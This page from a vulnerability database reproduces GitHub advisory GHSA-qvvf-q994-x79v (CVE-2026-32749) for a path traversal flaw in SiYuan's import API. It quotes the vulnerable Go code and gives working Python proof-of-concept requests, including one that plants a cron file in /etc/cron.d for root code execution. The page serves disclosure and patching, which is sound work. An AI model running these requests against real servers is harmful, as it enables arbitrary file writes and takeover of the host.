GHSA-QVVF-Q994-X79V

Vulnerability from github – Published: 2026-03-16 18:47 – Updated: 2026-03-30 13:58
VLAI?
Summary
SiYuan importSY/importZipMd: path traversal via multipart filename enables arbitrary file write
Details

Summary

POST /api/import/importSY and POST /api/import/importZipMd write uploaded archives to a path derived from the multipart filename field without sanitization, allowing an admin to write files to arbitrary locations outside the temp directory - including system paths that enable RCE.

Details

File: kernel/api/import.go - functions importSY and importZipMd

file := files[0]
writePath := filepath.Join(util.TempDir, "import", file.Filename)
writer, err := os.OpenFile(writePath, os.O_RDWR|os.O_CREATE, 0644)

importZipMd has a second traversal in unzipPath construction:

filenameMain := strings.TrimSuffix(file.Filename, filepath.Ext(file.Filename))
unzipPath    := filepath.Join(util.TempDir, "import", filenameMain)
gulu.Zip.Unzip(writePath, unzipPath)

filepath.Join calls filepath.Clean internally, but cleaning happens after concatenation - sufficient ../ sequences escape the base directory entirely. The curl tool sanitizes ../ in multipart filenames, so exploitation requires sending the raw HTTP request via Python requests or a custom client.

PoC

Environment:

docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

import requests, zipfile, io

HOST  = "http://localhost:6806"
TOKEN = "YOUR_ADMIN_TOKEN"

buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
    z.writestr("TestNB/20240101000000-abcdefg.sy",
        '{"ID":"20240101000000-abcdefg","Spec":"1","Type":"NodeDocument","Children":[]}')
    z.writestr("TestNB/.siyuan/sort.json", "{}")
buf.seek(0)

r = requests.post(f"{HOST}/api/import/importSY",
    headers={"Authorization": f"Token {TOKEN}"},
    files={"file": ("../../data/TRAVERSAL_PROOF.zip", buf.read(), "application/zip")},
    data={"notebook": "YOUR_NOTEBOOK_ID", "toPath": "/"})

print(r.text)

RCE via cron (root container):

cron = b"* * * * * root touch /tmp/RCE_CONFIRMED\n"
r = requests.post(f"{HOST}/api/import/importSY",
    headers={"Authorization": f"Token {TOKEN}"},
    files={"file": ("../../../../../etc/cron.d/siyuan_poc", cron, "application/zip")},
    data={"notebook": "NOTEBOOK_ID", "toPath": "/"})

Confirmed response on v3.6.0: {"code":0,"msg":"","data":null}

Impact

An admin can write arbitrary content to any path writable by the SiYuan process: - RCE via /etc/cron.d/ (root containers), ~/.bashrc, SSH authorized_keys - Data destruction by overwriting workspace or application files - In Docker containers running as root (common default), this grants full container compromise

Severity ?
7.6 (High)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260313024916-fd6526133bb3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32749"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T18:47:02Z",
    "nvd_published_at": "2026-03-19T21:17:10Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nPOST /api/import/importSY and POST /api/import/importZipMd write uploaded archives to a path derived from the multipart filename field without sanitization, allowing an admin to write files to arbitrary locations outside the temp directory - including system paths that enable RCE.\n\n### Details\nFile: kernel/api/import.go - functions importSY and importZipMd\n\n```go\nfile := files[0]\nwritePath := filepath.Join(util.TempDir, \"import\", file.Filename)\nwriter, err := os.OpenFile(writePath, os.O_RDWR|os.O_CREATE, 0644)\n```\n\nimportZipMd has a second traversal in unzipPath construction:\n```go\nfilenameMain := strings.TrimSuffix(file.Filename, filepath.Ext(file.Filename))\nunzipPath    := filepath.Join(util.TempDir, \"import\", filenameMain)\ngulu.Zip.Unzip(writePath, unzipPath)\n```\n\nfilepath.Join calls filepath.Clean internally, but cleaning happens after concatenation - sufficient ../ sequences escape the base directory entirely. The curl tool sanitizes ../ in multipart filenames, so exploitation requires sending the raw HTTP request via Python requests or a custom client.\n\n### PoC\n**Environment:**\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```python\nimport requests, zipfile, io\n\nHOST  = \"http://localhost:6806\"\nTOKEN = \"YOUR_ADMIN_TOKEN\"\n\nbuf = io.BytesIO()\nwith zipfile.ZipFile(buf, \u0027w\u0027) as z:\n    z.writestr(\"TestNB/20240101000000-abcdefg.sy\",\n        \u0027{\"ID\":\"20240101000000-abcdefg\",\"Spec\":\"1\",\"Type\":\"NodeDocument\",\"Children\":[]}\u0027)\n    z.writestr(\"TestNB/.siyuan/sort.json\", \"{}\")\nbuf.seek(0)\n\nr = requests.post(f\"{HOST}/api/import/importSY\",\n    headers={\"Authorization\": f\"Token {TOKEN}\"},\n    files={\"file\": (\"../../data/TRAVERSAL_PROOF.zip\", buf.read(), \"application/zip\")},\n    data={\"notebook\": \"YOUR_NOTEBOOK_ID\", \"toPath\": \"/\"})\n\nprint(r.text)\n```\n\n**RCE via cron (root container):**\n```python\ncron = b\"* * * * * root touch /tmp/RCE_CONFIRMED\\n\"\nr = requests.post(f\"{HOST}/api/import/importSY\",\n    headers={\"Authorization\": f\"Token {TOKEN}\"},\n    files={\"file\": (\"../../../../../etc/cron.d/siyuan_poc\", cron, \"application/zip\")},\n    data={\"notebook\": \"NOTEBOOK_ID\", \"toPath\": \"/\"})\n```\n\n**Confirmed response on v3.6.0:** {\"code\":0,\"msg\":\"\",\"data\":null}\n\n### Impact\nAn admin can write arbitrary content to any path writable by the SiYuan process:\n- RCE via /etc/cron.d/ (root containers), ~/.bashrc, SSH authorized_keys\n- Data destruction by overwriting workspace or application files\n- In Docker containers running as root (common default), this grants full container compromise",
  "id": "GHSA-qvvf-q994-x79v",
  "modified": "2026-03-30T13:58:28Z",
  "published": "2026-03-16T18:47:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-qvvf-q994-x79v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32749"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/5ee00907f0b0c4aca748ce21ef1977bb98178e14"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan importSY/importZipMd: path traversal via multipart filename enables arbitrary file write"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.